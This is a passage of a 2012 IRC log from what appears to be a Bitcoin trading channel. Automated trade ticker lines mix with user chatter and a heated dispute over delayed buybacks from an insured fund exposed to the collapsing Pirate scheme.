otherwise Aug 24 01:28:30 EmanuelDeOrtego_: does it do anything or is it an artistic piece? Aug 24 01:28:30 right. cause anyone could tell. Aug 24 01:28:37 [GLBSE] [ASICMINER] 17 @ 0.0988999 = 1.6813 BTC [-] Aug 24 01:28:49 boonies4u: It's part of a collection about the artist's wife's death or something Aug 24 01:28:54 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 24 01:28:59 EmanuelDeOrtego_: is she dead yet? Aug 24 01:29:01 I just like it because it's so retarded Aug 24 01:29:14 EmanuelDeOrtego_: cause, it might be the splatter canvas for when she does Aug 24 01:29:24 kill herself Aug 24 01:29:26 lol Aug 24 01:29:27 omg. Aug 24 01:29:35 Aug 20 16:38:19 micrea_popescu: Well, that is technically true Aug 24 01:29:35 then it would be worth 100k Aug 24 01:29:44 how teh ef did you misspell my name EmanuelDeOrtego_ ? Aug 24 01:29:47 [GLBSE] [BIB.PIRATE] 2 @ 0.6501 = 1.3002 BTC [+] Aug 24 01:29:49 did you TYPE IT OUT BY HAND ?! Aug 24 01:29:57 [GLBSE] [OBSI.HRPT] 1 @ 0.1049 BTC [+] Aug 24 01:29:59 micea_popescu: I'm a hangover Aug 24 01:30:03 in a* Aug 24 01:30:04 lol Aug 24 01:30:13 no tabs in texas. Aug 24 01:30:19 lol Aug 24 01:30:19 God, Aug 24 01:30:22 [GLBSE] [BIB.PIRATE] 20 @ 0.65 = 13 BTC [-] Aug 24 01:30:23 I actually mispelled it again Aug 24 01:30:29 Wow, my mental capabilities Aug 24 01:30:33 are just drat low Aug 24 01:30:37 srsly. that longer button under 1 next to q ? Aug 24 01:30:41 that thing. miracle worker. Aug 24 01:30:50 I don't look at my keyboard when I type Aug 24 01:30:56 [GLBSE] [FOO.PPPPT] 2 @ 0.6503 = 1.3006 BTC [-] Aug 24 01:30:58 EmanuelDeOrtego_: then feel for it Aug 24 01:31:18 [GLBSE] [OBSI.HRPT] 5 @ 0.10495 = 0.5248 BTC [+] Aug 24 01:31:40 I like that there are so many women involved with Bitcoin. Aug 24 01:31:46 I dream of the day women rule society Aug 24 01:31:50 like a filthy feminist Aug 24 01:31:56 I just like change. Aug 24 01:32:07 because thins are boring otherwise Aug 24 01:32:09 things* Aug 24 01:33:11 [GLBSE] [FOO.PPPPT] 2 @ 0.6503 = 1.3006 BTC [-] Aug 24 01:33:27 [GLBSE] [FPGAMINING] 1 @ 0.9198 BTC [+] Aug 24 01:33:51 [GLBSE] [ASICMINER] 11 @ 0.0989999 = 1.089 BTC [+] Aug 24 01:34:12 [GLBSE] [ASICMINER] 9 @ 0.0989999 = 0.891 BTC [+] Aug 24 01:34:14 [GLBSE] [FOO.PPPPT] 15 @ 0.6502 = 9.753 BTC [-] Aug 24 01:34:26 [MPEX] [O.BTCUSD.C100T] 310 @ 0.08439778 = 26.1633 BTC [-] Aug 24 01:34:35 anyone here ever have buggy favicons on GLBSE? Aug 24 01:35:06 what is a favicon Aug 24 01:35:15 [GLBSE] [FOO.PPPPT] 10 @ 0.65 = 6.5 BTC [-] Aug 24 01:35:32 EmanuelDeOrtego_: it's the thumbnail beside the title of a webpage on the tab it has Aug 24 01:35:49 for bitcoin.clarkmoody.com it's a white M over a red background Aug 24 01:36:00 as an example Aug 24 01:36:22 Yep, I see it Aug 24 01:36:25 Never cared for it Aug 24 01:36:29 Never saw a use for it Aug 24 01:36:31 but its there Aug 24 01:36:59 how can that be buggy ? Aug 24 01:37:12 Corruption caused by a bad power grid Aug 24 01:37:18 Unlikel Aug 24 01:37:20 y Aug 24 01:37:22 but possible Aug 24 01:37:24 on https://glbse.com/portfolio I have the proper favicon Aug 24 01:37:39 but on these /asset/ pages I am not Aug 24 01:37:53 it was so nice and quiet in here Aug 24 01:37:53 Looks fine from here, sir. Aug 24 01:37:56 i belive the favicon is properly nested in the html though Aug 24 01:38:02 EmanuelDeOrtego_: ok Aug 24 01:38:08 EmanuelDeOrtego_: what browser do you use? Aug 24 01:38:11 sunspots Aug 24 01:38:19 The latest Mozilla Aug 24 01:38:24 on Ubuntu Aug 24 01:38:27 EmanuelDeOrtego_: ah ok Aug 24 01:38:32 exahash nice never lasts. Aug 24 01:38:44 hash never lasts? Aug 24 01:40:30 exahash: it was never a good neighborhood, you were just too preoccupied and complacent to notice how bad it was Aug 24 01:41:57 i should blog about something Aug 24 01:42:00 ik denk dat tabblad dashboard en list assets voorlopig voldoende is voor aandeelhouders Aug 24 01:42:27 .tr ik denk dat tabblad dashboard en list assets voorlopig voldoende is voor aandeelhouders Aug 24 01:42:27 mircea_popescu: "I think tab dashboard and list assets provisionally sufficient for shareholders" (nl to en, translate.google.com) Aug 24 01:45:57 :) Aug 24 01:46:06 good translation Aug 24 01:46:30 we are building our public spreadsheet Aug 24 01:46:56 but wrong window :) Aug 24 01:48:00 lotsa vo's :D Aug 24 01:48:47 Qhat the hell am I reading Aug 24 01:49:18 :P Aug 24 01:49:36 :D Aug 24 01:51:04 [GLBSE] [JTME] 2 @ 0.96 = 1.92 BTC [+] Aug 24 01:51:06 [GLBSE] [JTME] 1 @ 0.95 BTC [-] Aug 24 01:51:07 [GLBSE] [JTME] 1 @ 0.93 BTC [-] Aug 24 01:51:08 [GLBSE] [JTME] 11 @ 0.92 = 10.12 BTC [-] Aug 24 01:51:48 [GLBSE] [BBBB] 10 @ 0.00028 = 0.0028 BTC [+] Aug 24 01:53:33 [GLBSE] [RSM] 2 @ 0.29 = 0.58 BTC [-] Aug 24 01:53:34 [GLBSE] [RSM] 45 @ 0.3 = 13.5 BTC [+] Aug 24 01:59:29 [MPEX] [F.GIGA.ETF] 6800 @ 0.00100754 = 6.8513 BTC [-] Aug 24 02:03:59 [GLBSE] [PPT.B] 111 @ 0.95 = 105.45 BTC [+] Aug 24 02:05:14 [MPEX] [S.MPOE] 25000 @ 0.00038799 = 9.6998 BTC [-] Aug 24 02:05:16 [MPEX] [S.MPOE] 2058 @ 0.00038798 = 0.7985 BTC [-] Aug 24 02:05:40 [GLBSE] [TYGRR.BOND-P] 1 @ 0.8 BTC [+] Aug 24 02:05:41 [GLBSE] [TYGRR.BOND-P] 19 @ 0.808 = 15.352 BTC [+] Aug 24 02:09:14 [GLBSE] [TYGRR.BOND-P] 11 @ 0.808 = 8.888 BTC [+] Aug 24 02:19:16 [GLBSE] [BITCOINTORRENTZ] 22 @ 0.4 = 8.8 BTC [-] Aug 24 02:19:40 [GLBSE] [OBSI.HRPT] 4 @ 0.10494 = 0.4198 BTC [-] Aug 24 02:20:39 [MPEX] [F.GIGA.ETF] 4300 @ 0.001004 = 4.3172 BTC [-] Aug 24 02:20:40 [MPEX] [F.GIGA.ETF] 1700 @ 0.00100754 = 1.7128 BTC [+] Aug 24 02:20:42 [MPEX] [F.GIGA.ETF] 287 @ 0.00101538 = 0.2914 BTC [+] Aug 24 02:24:17 [GLBSE] [OBSI.HRPT] 1 @ 0.10494 BTC [-] Aug 24 02:27:41 [GLBSE] [FPGAMINING] 4 @ 0.9001 = 3.6004 BTC [-] Aug 24 02:27:42 [GLBSE] [FPGAMINING] 2 @ 0.9 = 1.8 BTC [-] Aug 24 02:27:43 [GLBSE] [FPGAMINING] 4 @ 0.8702 = 3.4808 BTC [-] Aug 24 02:27:44 [GLBSE] [FPGAMINING] 3 @ 0.87 = 2.61 BTC [-] Aug 24 02:27:45 [GLBSE] [FPGAMINING] 3 @ 0.86 = 2.58 BTC [-] Aug 24 02:37:59 [MPEX] [S.MPOE] 200 @ 0.00038917 = 0.0778 BTC [+] Aug 24 02:38:01 [MPEX] [S.MPOE] 36500 @ 0.00038971 = 14.2244 BTC [+] Aug 24 02:38:02 [MPEX] [S.MPOE] 3810 @ 0.00039395 = 1.5009 BTC [+] Aug 24 02:38:03 [MPEX] [S.MPOE] 3800 @ 0.0003941 = 1.4976 BTC [+] Aug 24 02:38:05 [MPEX] [S.MPOE] 18590 @ 0.00039446 = 7.333 BTC [+] Aug 24 02:38:45 [GLBSE] [BBBB] 1500 @ 0.00025 = 0.375 BTC [-] Aug 24 02:39:16 [GLBSE] [NYAN.C] 1 @ 0.94 BTC [-] Aug 24 02:41:27 [GLBSE] [ASICMINER] 5 @ 0.0989999 = 0.495 BTC [+] Aug 24 02:44:19 [GLBSE] [ASICMINER] 3 @ 0.0989999 = 0.297 BTC [+] Aug 24 02:44:52 [GLBSE] [NYAN.C] 3 @ 0.94 = 2.82 BTC [-] **** BEGIN LOGGING AT Fri Aug 24 10:41:45 2012 Aug 24 10:59:32 [MPEX] [S.MPOE] 10389 @ 0.00038765 = 4.0273 BTC [+] Aug 24 10:59:33 [MPEX] [S.MPOE] 2500 @ 0.00038999 = 0.975 BTC [+] Aug 24 10:59:35 [MPEX] [S.MPOE] 2111 @ 0.0003902 = 0.8237 BTC [+] Aug 24 11:04:03 [MPEX] [F.GIGA.ETF] 5184 @ 0.00101197 = 5.2461 BTC [-] Aug 24 11:05:19 DeaDTerra hey, how do you plan to handle all the people that overbid your PT ? Aug 24 11:05:27 i mean, there's people bidding 0.034 and stuff ?! Aug 24 11:05:41 [GLBSE] [BIB.BVPS] 1 @ 0.004 BTC [+] Aug 24 11:08:24 [GLBSE] [YARR] 3 @ 0.99999998 = 3 BTC [+] Aug 24 11:14:54 [GLBSE] [GMVT-BOT] 5 @ 0.091 = 0.455 BTC [-] Aug 24 11:15:42 what PT? Aug 24 11:16:20 [GLBSE] [TYGRR.BOND-P] 6 @ 0.7 = 4.2 BTC [-] Aug 24 11:18:04 passthrough? Aug 24 11:33:30 passthrough Aug 24 11:40:37 [MPEX] [S.MPOE] 15090 @ 0.00038698 = 5.8395 BTC [-] Aug 24 11:40:38 [MPEX] [S.MPOE] 4510 @ 0.00038683 = 1.7446 BTC [-] Aug 24 11:49:35 [MPEX] [F.GIGA.ETF] 4800 @ 0.00101193 = 4.8573 BTC [-] Aug 24 11:49:44 usage still no buy back on my yarr or divs, are u waiting for pirate? Aug 24 11:49:54 usagi * Aug 24 11:50:53 [MPEX] [S.MPOE] 22349 @ 0.00038683 = 8.6453 BTC [-] Aug 24 11:50:59 I thought cpa insured yarr Aug 24 11:52:49 Hi lucidize Aug 24 11:53:05 hello =) Aug 24 11:53:06 Yes if there aren't enough assets in YARR to pay out the backing, CPA will step in. Aug 24 11:53:18 Yes I'm waiting for pirate. Aug 24 11:53:46 There are not many buyers right now, if I sell 2000 coins worth of bonds the market will crash Aug 24 11:54:11 So expect the process to take a couple of weeks if he doesn't pay Aug 24 11:54:47 usagi wait, why would yousell bonds ? Aug 24 11:54:55 I have been waiting since Monday for the div, but its bot coming? Aug 24 11:55:07 Because YARR holds 1 btc in bonds and other stocks for each 1 btc it has in pirate passthrus. Aug 24 11:55:29 The money is there, I just don't want to dump it on the market all at once. Aug 24 11:55:37 also no news in but back Aug 24 11:55:48 If I do it slowly then theoretically as I sell off the assets, people will reinvest at least part of it and the market won't crash Aug 24 11:55:57 It's a theory which is working so far Aug 24 11:55:59 what will be dumped if u buy back the yarr bonds? Aug 24 11:56:25 If you knew that you could make money because you know I have to sell out Aug 24 11:56:31 so you could sell those holdings in front of me Aug 24 11:56:47 the yarr? Aug 24 11:56:48 If I don't sell it for what it's worth there won't be enough to cover the pirate. Aug 24 11:57:03 Even if I had 3x trhe money... selling it all at once wouldn't yield enough to cover the 1x in pirate Aug 24 11:57:19 Anyway I have to go to work, I will see about buying back more later today Aug 24 11:58:02 lol apparently people are discovering how finance works. Aug 24 11:58:17 Duhh, when I bought in, I didn't buy in at a high price either :p Aug 24 11:58:41 I didn't move the market up. Aug 24 11:59:10 Its a concern, if I did, then sold out and move the market down, I could easily lose 30% Aug 24 11:59:16 without even realizing what happened Aug 24 11:59:27 Then there would be no money to pay back yarr holders Aug 24 11:59:42 what market, usd? Aug 24 12:02:28 feels like I'm just told to f.o. every time I ask about the buy back, don't know why its so difficult and I'm losing my patience with yarr now Aug 24 12:03:36 when I bought in it was insured for 1.3 now when its. it back time its just 1 Aug 24 12:04:07 sry typo, Damn phone Aug 24 12:09:33 yarr was always insured for 1 Aug 24 12:10:00 Lucidize: I'll give you $9 mtgox per YARR if you want out Aug 24 12:10:26 or 0.9 BTC per Aug 24 12:10:58 why would I do that when the terms state a buy back at 1? Aug 24 12:11:10 If you want out now, rather than when usagi pays you back Aug 24 12:12:45 I was told to wait a day on Sunday, I have been waiting many more unexpected days, waiting for a div and a buy back, neither have happened. Surely you can understand why I have become impatient today Aug 24 12:14:44 I don't understand the connection if cpa and pirate, why there are no funds to continue with buy back Aug 24 12:14:51 *of Aug 24 12:17:47 Well I'm not Usagi, I cant offer 1 or I'd make nothing on it :P Aug 24 12:17:59 But if you don't think he will pay you back, I'm more than willing to take that risk for you Aug 24 12:18:18 CPA splits its funds, 1 BTC in pirate for every 1 BTC in other bonds Aug 24 12:18:29 In the event of a pirate default, CPA has to sell off its hedge bonds Aug 24 12:18:49 [MPEX] [F.GIGA.ETF] 3221 @ 0.00099376 = 3.2009 BTC [-] Aug 24 12:18:50 [MPEX] [F.GIGA.ETF] 4100 @ 0.00099236 = 4.0687 BTC [-] Aug 24 12:18:51 [MPEX] [F.GIGA.ETF] 1238 @ 0.00099074 = 1.2265 BTC [-] Aug 24 12:18:52 [MPEX] [F.GIGA.ETF] 11700 @ 0.00099061 = 11.5901 BTC [-] Aug 24 12:18:53 [MPEX] [F.GIGA.ETF] 12 @ 0.00098583 = 0.0118 BTC [-] Aug 24 12:19:25 ok I didn't know that luceo, switching to comp brb Aug 24 12:20:42 I thought CPA had a backer, didn't realise it was pirate investments Aug 24 12:21:28 Lucidize from what i understand it's a reinvent-the-wheel approach at a cdo Aug 24 12:21:37 so it has some pirate investments, and some other investments, and some tiers. Aug 24 12:21:50 I'm beginning to wish I never invested tbh Aug 24 12:22:07 It's turned out to be a right mess Aug 24 12:22:58 what's the problem tho, it missed a dividend date ? Aug 24 12:23:42 !ticker DARKHORSE Aug 24 12:23:44 Invalid ticker. Aug 24 12:24:50 [GLBSE] [GIGAMINING] 1 @ 0.974 BTC [-] Aug 24 12:24:53 [GLBSE] [GIGAMINING] 2 @ 0.9788 = 1.9576 BTC [+] Aug 24 12:24:54 Well I tried to get my last YARR sold off last weekend, I spoke to usagi who said on Sunday to just be patient, wait for the div monday and there would be a buy back Aug 24 12:26:01 Many days later, neither have happened. I just didn't realise it all depended on if and when pirate was going to pay out Aug 24 12:26:44 [GLBSE] [TYGRR.BOND-P] 3 @ 0.69 = 2.07 BTC [-] Aug 24 12:30:13 [MPEX] [S.MPOE] 200 @ 0.00038763 = 0.0775 BTC [+] Aug 24 12:35:38 [MPEX] [S.MPOE] 1400 @ 0.00038817 = 0.5434 BTC [+] Aug 24 12:35:40 [MPEX] [S.MPOE] 11505 @ 0.0003902 = 4.4893 BTC [+] Aug 24 12:35:41 [MPEX] [S.MPOE] 295 @ 0.00039088 = 0.1153 BTC [+] Aug 24 12:37:21 this is a problem. Aug 24 12:37:54 GLBSE back up Aug 24 12:38:02 and reserve requirements for buy orders have been removed Aug 24 12:40:29 [GLBSE] [GIGAMINING] 2 @ 0.9788 = 1.9576 BTC [+] Aug 24 12:41:43 [MPEX] [F.GIGA.ETF] 9100 @ 0.00100429 = 9.139 BTC [+] Aug 24 12:42:27 [GLBSE] [BDT] 2 @ 1.09 = 2.18 BTC [+] Aug 24 12:51:35 mornin Aug 24 12:52:31 heya Aug 24 12:53:38 how is it Aug 24 12:54:59 [GLBSE] [ASICMINER] 100 @ 0.093 = 9.3 BTC [-] Aug 24 12:55:51 not so bad really. Aug 24 12:55:56 eating peaches. Aug 24 12:56:22 [MPEX] [S.MPOE] 12200 @ 0.00039088 = 4.7687 BTC [+] Aug 24 12:58:33 [GLBSE] [BITCOINMINV] 1 @ 0.126 BTC [+] Aug 24 12:59:18 nice Aug 24 13:00:23 http://i.somethingawful.com/u/garbageday/2012/phriday/child_computer/Snakez_01.jpg Aug 24 13:01:21 lol Aug 24 13:01:23 SA nao ? Aug 24 13:01:27 we're gaining ground Aug 24 13:04:34 :) Aug 24 13:06:28 [GLBSE] [PAJKA.BOND] 9 @ 0.087 = 0.783 BTC [-] Aug 24 13:07:39 [MPEX] [S.MPOE] 200 @ 0.00038857 = 0.0777 BTC [-] Aug 24 13:17:00 [GLBSE] [ASICMINER] 2 @ 0.094 = 0.188 BTC [+] Aug 24 13:19:04 ;;ticker Aug 24 13:19:04 Best bid: 9.95149, Best ask: 9.993, Bid-ask spread: 0.04151, Last trade: 9.993, 24 hour volume: 58267, 24 hour low: 9.774, 24 hour high: 10.25 Aug 24 13:19:15 the soul of stability. Aug 24 13:21:12 bam crash. Aug 24 13:22:12 [GLBSE] [TYGRR.BOND-P] 8 @ 0.7 = 5.6 BTC [+] Aug 24 13:22:15 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [+] Aug 24 13:23:54 [GLBSE] [TYGRR.BOND-P] 1 @ 0.71 BTC [+] Aug 24 13:23:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.72 BTC [+] Aug 24 13:23:59 [GLBSE] [TYGRR.BOND-P] 2 @ 0.73 = 1.46 BTC [+] Aug 24 13:26:28 [GLBSE] [ASICMINER] 10 @ 0.09499999 = 0.95 BTC [+] Aug 24 13:30:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 24 13:34:57 [GLBSE] [MERGEDMINING] 6 @ 0.095 = 0.57 BTC [+] Aug 24 13:43:42 >Meanwhile, since this post went up five days ago, SatoshiDICE has been making so much money that the IPO price is now only a 9x multiple. SD made over 2000 BTC in net profit today, which is almost a tenth of what I'm asking for in the IPO... earned in one day. Maybe I'm pricing this too low :/ Will post updated stats in the google doc tomorrow. Aug 24 13:49:18 [GLBSE] [PUREMINING] 2 @ 0.095 = 0.19 BTC [-] Aug 24 13:50:32 they might have made 2k that day Aug 24 13:50:39 but they'll give 2k + .5k back Aug 24 13:50:40 the next day Aug 24 13:52:36 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [+] Aug 24 13:55:45 [GLBSE] [ASICMINER] 20 @ 0.095 = 1.9 BTC [+] Aug 24 13:56:27 I just had a hilarious idea Aug 24 13:56:31 pirating lillyhammer. Aug 24 13:59:07 [GLBSE] [FOO.PPPPT] 5 @ 0.65 = 3.25 BTC [+] Aug 24 13:59:49 rg you make sure of it:D Aug 24 14:00:27 rg: you know whats fucking hard? Aug 24 14:00:37 not murdering whoever invented the web browser Aug 24 14:01:16 [GLBSE] [PUREMINING] 3 @ 0.095 = 0.285 BTC [-] Aug 24 14:02:26 hehe Aug 24 14:02:32 what's your current browser of choice Aug 24 14:02:40 thats not what I mean Aug 24 14:02:47 the whole state of html and css is fucking bullshit Aug 24 14:02:58 its just as bad as it was 10 fucking years ago Aug 24 14:03:07 infact, its worse Aug 24 14:03:17 I can build entire fucking websites without a fucking image in the place Aug 24 14:03:25 except I have to work like 5 times fucking harder doing it Aug 24 14:04:07 [GLBSE] [PUREMINING] 13 @ 0.095 = 1.235 BTC [-] Aug 24 14:06:03 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [-] Aug 24 14:07:27 [GLBSE] [ASICMINER] 35 @ 0.095 = 3.325 BTC [+] Aug 24 14:10:17 [MPEX] [S.MPOE] 17000 @ 0.00038843 = 6.6033 BTC [-] Aug 24 14:10:19 [MPEX] [S.MPOE] 8700 @ 0.00038944 = 3.3881 BTC [+] Aug 24 14:10:20 [MPEX] [S.MPOE] 8923 @ 0.00039088 = 3.4878 BTC [+] Aug 24 14:11:43 [MPEX] [F.PURE.SYNTH] 117101 @ 0.000105 = 12.2956 BTC [-] Aug 24 14:17:31 [MPEX] [S.MPOE] 21500 @ 0.00038816 = 8.3454 BTC [-] Aug 24 14:20:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.71 BTC [+] Aug 24 14:20:37 [GLBSE] [TYGRR.BOND-P] 1 @ 0.72 BTC [+] Aug 24 14:20:40 [GLBSE] [TYGRR.BOND-P] 3 @ 0.73 = 2.19 BTC [+] Aug 24 14:20:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.73 BTC [+] Aug 24 14:23:02 [MPEX] [S.MPOE] 16256 @ 0.00038816 = 6.3099 BTC [-] Aug 24 14:23:04 [MPEX] [S.MPOE] 23714 @ 0.00038695 = 9.1761 BTC [-] Aug 24 14:30:16 [MPEX] [S.MPOE] 8060 @ 0.00038695 = 3.1188 BTC [-] Aug 24 14:30:17 [MPEX] [S.MPOE] 9540 @ 0.00038683 = 3.6904 BTC [-] Aug 24 14:31:38 [MPEX] [S.MPOE] 200 @ 0.00039079 = 0.0782 BTC [+] Aug 24 14:31:40 [MPEX] [S.MPOE] 11980 @ 0.00039178 = 4.6935 BTC [+] Aug 24 14:31:41 [MPEX] [S.MPOE] 7900 @ 0.00039251 = 3.1008 BTC [+] Aug 24 14:31:41 [MPEX] [S.MPOE] 53441 @ 0.00039317 = 21.0114 BTC [+] Aug 24 14:31:42 [MPEX] [S.MPOE] 5000 @ 0.00039341 = 1.9671 BTC [+] Aug 24 14:31:44 [MPEX] [S.MPOE] 32600 @ 0.00039396 = 12.8431 BTC [+] Aug 24 14:31:45 [MPEX] [S.MPOE] 29100 @ 0.00039419 = 11.4709 BTC [+] Aug 24 14:31:46 [MPEX] [S.MPOE] 33500 @ 0.00039494 = 13.2305 BTC [+] Aug 24 14:31:47 [MPEX] [S.MPOE] 7939 @ 0.00039571 = 3.1415 BTC [+] Aug 24 14:31:48 [MPEX] [S.MPOE] 11100 @ 0.00039583 = 4.3937 BTC [+] Aug 24 14:31:49 [MPEX] [S.MPOE] 27470 @ 0.00039597 = 10.8773 BTC [+] Aug 24 14:31:50 [MPEX] [S.MPOE] 20758 @ 0.00039615 = 8.2233 BTC [+] Aug 24 14:31:51 [MPEX] [S.MPOE] 12300 @ 0.00039625 = 4.8739 BTC [+] Aug 24 14:31:51 [MPEX] [S.MPOE] 700 @ 0.00039643 = 0.2775 BTC [+] Aug 24 14:31:53 [MPEX] [S.MPOE] 31200 @ 0.00039697 = 12.3855 BTC [+] Aug 24 14:31:54 [MPEX] [S.MPOE] 4438 @ 0.00039726 = 1.763 BTC [+] Aug 24 14:31:55 [MPEX] [S.MPOE] 21200 @ 0.00039779 = 8.4331 BTC [+] Aug 24 14:31:56 [MPEX] [S.MPOE] 28900 @ 0.0003985 = 11.5167 BTC [+] Aug 24 14:31:57 [MPEX] [S.MPOE] 39300 @ 0.00039909 = 15.6842 BTC [+] Aug 24 14:31:58 [MPEX] [S.MPOE] 3172 @ 0.00039909 = 1.2659 BTC [+] Aug 24 14:31:59 [MPEX] [S.MPOE] 11600 @ 0.00039994 = 4.6393 BTC [+] Aug 24 14:32:00 [MPEX] [S.MPOE] 106202 @ 0.0004 = 42.4808 BTC [+] Aug 24 14:32:13 [GLBSE] [TYGRR.BOND-P] 10 @ 0.66 = 6.6 BTC [-] Aug 24 14:32:16 [GLBSE] [TYGRR.BOND-P] 10 @ 0.66 = 6.6 BTC [-] Aug 24 14:41:01 [GLBSE] [BITBOND] 3 @ 0.46 = 1.38 BTC [+] Aug 24 14:41:41 [GLBSE] [FUTUREFUND] 1420 @ 0.0001185 = 0.1683 BTC [+] Aug 24 14:42:29 [GLBSE] [TYGRR.BOND-P] 10 @ 0.66 = 6.6 BTC [-] Aug 24 14:43:01 [GLBSE] [OBSI.HRPT] 55 @ 0.104 = 5.72 BTC [+] Aug 24 14:43:37 [GLBSE] [FUTUREFUND] 10 @ 0.000119 = 0.0012 BTC [+] Aug 24 14:45:43 [GLBSE] [OBSI.HRPT] 141 @ 0.104 = 14.664 BTC [+] Aug 24 14:49:13 [GLBSE] [OBSI.HRPT] 299 @ 0.104939 = 31.3768 BTC [+] Aug 24 14:52:02 [GLBSE] [JAH] 5 @ 0.17 = 0.85 BTC [-] Aug 24 14:59:52 [GLBSE] [JAH] 2 @ 0.17 = 0.34 BTC [-] Aug 24 15:08:41 [GLBSE] [DMC] 1 @ 0.05 BTC [+] Aug 24 15:17:12 [GLBSE] [OBSI.HRPT] 5 @ 0.105 = 0.525 BTC [+] Aug 24 15:17:21 [GLBSE] [TYGRR.BOND-P] 2 @ 0.66 = 1.32 BTC [-] Aug 24 15:21:16 [MPEX] [S.MPOE] 15100 @ 0.00039498 = 5.9642 BTC [-] Aug 24 15:21:28 !ticker s.mpoe Aug 24 15:21:29 [MPEX:S.MPOE] 1day: 0.00038683 / 0.00039107 / 0.0004 (2487575 shares, 972.82 BTC), 30day: 0.0001 / 0.00036755 / 0.00041457 (62495862 shares, 22,970.84 BTC) Aug 24 15:27:37 [GLBSE] [ASICMINER] 15 @ 0.09 = 1.35 BTC [-] Aug 24 15:27:44 [GLBSE] [PAJKA.BOND] 10 @ 0.08999999 = 0.9 BTC [+] Aug 24 15:29:37 [MPEX] [F.GIGA.ETF] 11700 @ 0.0009959 = 11.652 BTC [-] Aug 24 15:35:01 [MPEX] [F.GIGA.ETF] 4500 @ 0.0009959 = 4.4816 BTC [-] Aug 24 15:35:02 [MPEX] [F.GIGA.ETF] 3800 @ 0.00100429 = 3.8163 BTC [+] Aug 24 15:44:17 [GLBSE] [GIGAMINING] 1 @ 0.9788 BTC [+] Aug 24 15:44:22 [MPEX] [S.MPOE] 35800 @ 0.00039486 = 14.136 BTC [-] Aug 24 15:44:23 [MPEX] [S.MPOE] 21300 @ 0.0003952 = 8.4178 BTC [+] Aug 24 15:47:56 [GLBSE] [TYGRR.BOND-P] 2 @ 0.66 = 1.32 BTC [-] Aug 24 15:48:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.66 BTC [-] Aug 24 15:51:40 [GLBSE] [YABMC] 1 @ 0.121 BTC [+] Aug 24 15:55:18 Lucidize CPA does not invest in pirate. Aug 24 15:55:28 We have one pirate contract worth 1280 coins and that's essentially it Aug 24 15:55:38 Through NYAN we're exposed to less than 500 bitcoins in pirate. Aug 24 15:55:52 You're just going to have to wait like everyone else Aug 24 15:57:02 usagi, you told me on Sunday to wait one more day, I would prefer you to just say the truth and be an ass like you are now, then at least I know where I stand Aug 24 15:57:11 An ass? Aug 24 15:57:20 Well then let me tell you where you stand Aug 24 15:57:26 You're just going to have to wait like everyone else Aug 24 15:57:27 You stand in line like everyone else. What, you want special treatment? Aug 24 15:57:29 So do I Aug 24 15:57:32 I want special treatment too Aug 24 15:57:37 All you have to do is be professional Aug 24 15:57:38 I want pirate to pay me right now. Aug 24 15:57:43 I am :) Aug 24 15:58:28 In fact pirate has insinuated he would pay PPT owners last Aug 24 15:58:48 I have been quite patient and discussed it in pm previously, I don't intend to be rude Aug 24 15:58:50 So here's the deal Aug 24 15:58:59 If you want to trade shares for a % of what's in YARR you're welcome to it Aug 24 15:59:00 [GLBSE] [MU] 5 @ 0.49 = 2.45 BTC [-] Aug 24 15:59:12 hey you two, simmer down eh ? Aug 24 16:00:30 usagi did YARR move to weekly dividends or something like that ? Aug 24 16:00:35 No Aug 24 16:00:51 We paid in advance. People would invest on a wednesday and get 0.01 per day until pirate paid me Aug 24 16:01:10 So when pirate said game over next week, we naturally just stopped paying divs. Which is what our contract says. Aug 24 16:01:13 a. Aug 24 16:01:33 We've bought back a lot of shares already, maybe 1000? Aug 24 16:01:46 Lucidize is probably last in line at 1btc lol Aug 24 16:01:50 Try 0.99999 Aug 24 16:01:53 you'll get bought out first Aug 24 16:01:56 You are so very rude Aug 24 16:02:02 I'm actually at the top Aug 24 16:02:24 and 2 people have pipped in above me Aug 24 16:02:38 158 0.9999999 ? Aug 24 16:02:42 yes Aug 24 16:04:48 FUCK THIS COUNTRY AND ITS SHITTY NET!!!! Aug 24 16:05:04 daily nefario message brought to you by nefario & china mobile. Aug 24 16:05:11 I don't know why you're being so rude to be fai, I guess you just don't have the answers Aug 24 16:05:15 *fair Aug 24 16:06:57 Lol rude Aug 24 16:07:04 I just came on and you started calling me an ass Aug 24 16:07:38 feels like I'm in a time warp Aug 24 16:07:44 let's just leave it there Aug 24 16:07:54 no seriously, you're not helping each other. usagi, got a timeframe for buying out the 158 ? Aug 24 16:08:05 Yeah I do Aug 24 16:08:26 it's written down right beside the timeframe that pirate gave us when he said he would pay out this week Aug 24 16:08:41 ya but see, you're running an insured fund. Aug 24 16:08:48 so what if pirate doesn't pay at all ? Aug 24 16:08:48 And? Aug 24 16:08:58 Where does it say I have to pay out if pirate says he will pay next week? Aug 24 16:09:11 If this goes on another week or so, I might have to liquidize more Aug 24 16:09:18 what you have to do is tell people what to expect, in concrete terms, see ? so they know what to expect. Aug 24 16:09:18 But if I drpo 2000btc on the market it will crash Aug 24 16:09:23 and then there won't be any money left Aug 24 16:09:27 Problem is, I did. Aug 24 16:09:31 Instead of dealing with it appropriately, all you are doing is coming across unprofessional Aug 24 16:09:36 if you don't tell them what to expect they pick something random, expect that, and then it just gets everyone frustrated. Aug 24 16:09:37 Not at all Aug 24 16:09:41 So you have your own caluse Aug 24 16:09:45 *clause Aug 24 16:09:47 ok, so what should people expect ? Aug 24 16:09:54 Well for one Aug 24 16:09:54 about market prices and how much you can sell for? Aug 24 16:09:57 go read the thread online Aug 24 16:10:18 I mean I don't mind answering questions but if you're going to call me an ass and say I am being unprofessional when it's obvious you haven't even done basic research Aug 24 16:10:29 I mean thats pretty ironic actually. Aug 24 16:11:00 Well it's not going to change my mind the further this goes on, I will just learn my lesson in dealing with you from here. Ok thanks Aug 24 16:11:01 Step one, you have to realize pirate hasn't defaulted yet. Aug 24 16:11:11 With anyone bro Aug 24 16:11:21 Pirate didn't default because you aren't getting 7% a week Aug 24 16:11:27 That isn't how it works. Aug 24 16:12:01 He's shutting down his bank. I didn't get any dividend payments. And I don't have the money. But as I am told, by pirate, payments are coming out soon, within a week Aug 24 16:12:19 Why the 